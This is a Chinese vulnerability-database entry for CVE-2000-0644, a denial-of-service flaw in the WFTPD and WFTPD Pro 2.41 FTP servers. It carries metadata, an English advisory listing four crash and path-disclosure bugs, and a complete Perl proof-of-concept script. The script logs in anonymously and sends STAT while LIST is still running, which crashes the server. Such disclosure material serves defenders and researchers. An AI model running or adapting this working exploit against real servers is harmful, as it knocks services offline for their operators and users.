WFTPD和WFTPD Pro服务拒绝漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105936 漏洞类型 未知
发布时间 2000-07-21 更新时间 2005-05-02
CVE编号 CVE-2000-0644 CNNVD-ID CNNVD-200007-057
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-057
|漏洞详情
WFTPD和WFTPDPro2.41版本存在漏洞。远程攻击者通过LIST命令仍然执行时执行STAT命令从而导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/1506/info

WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.

1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends STAT without waiting for LIST to finish, which will cause the server
# to crash.
#

use IO::Socket;

$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

# Issue a LIST command, then STAT. If the STAT arrives before the LISTing
# is finished, the server will crash.
print $socket "USER $user\nPASS $pass\nLIST\nSTAT\n";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
|参考资料

来源:BID
名称:1506
链接:http://www.securityfocus.com/bid/1506
来源:BUGTRAQ
名称:20000721WFTPD/WFTPDPro2.41RC11vulnerabilities.
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.html
来源:XF
名称:wftpd-stat-dos
链接:http://xforce.iss.net/static/5003.php
来源:OSVDB
名称:1477
链接:http://www.osvdb.org/1477